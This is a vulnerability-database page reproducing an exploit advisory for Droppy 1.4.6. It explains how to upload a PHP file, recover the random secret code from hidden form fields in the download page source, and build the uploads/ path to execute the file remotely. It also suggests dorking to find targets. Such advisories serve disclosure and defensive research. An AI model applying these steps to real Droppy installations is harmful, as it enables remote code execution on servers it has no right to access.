Vulners
Lucene search
Amazon S3 Droppy 1.4.6 Shell Upload
`============================================================================================================================
| # Title : Amazon S3 Droppy v 1.4.6 File Upload Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : https://codecanyon.net/item/droppy-online-file-sharing/10575317 |
| # Dork : n/a |
============================================================================================================================
poc :
[+] Droppy is an online file sharing platform that can be used to share multiple files among friends,
family and colleagues. The files can be sent by email or an url that can be shared with everyone you would like to.
[+] Dorking İn Google Or Other Search Enggine
[+] Select file Ev!l.php and send it to your e-mail or to direct link.
[+] it can be accessed remotely and run code execution.
[+] script save a copy of your file in the web server in dir " uploads/" with a secret code
[+] when you click in link to download your file right click and choose view source of download link not the page of your email:
[+] Exampel : view-source:http://droppy.proxibolt.com/PrHEtFg
[+] The script stores the attached files sent inside the hosting server of the website
It does not give you the storage path, but when you open the source code of the sending page,
you will find the path of the attached file, and it can be accessed remotely and run
Means line 100 It contains the secret code generated randomly by the script that
renames the file attached to it and stores it inside the folder
And when you enter the storage path and combine the secret code with the file name,
the file opens for you inside the server,
[+] Line 99 , 100 , 101
>
> <input type="hidden" name="action" id="action" value="download">
> <input type="hidden" name="secret_code" id="secret_code" value="c40c11023e25cb7cfcba1345c4e26f72">
> <input type="hidden" name="download_id" id="download_id" value="PrHEtFg">
>
[+] add the secret code with name of your file that give you access .
[+] http://127.0.0.1/Droppy/uploads/c40c11023e25cb7cfcba1345c4e26f72-x.php
====Greetings to :=========================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
===========================================================================================================================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jul 2023 00:00Current
7.1High risk
Vulners AI Score7.1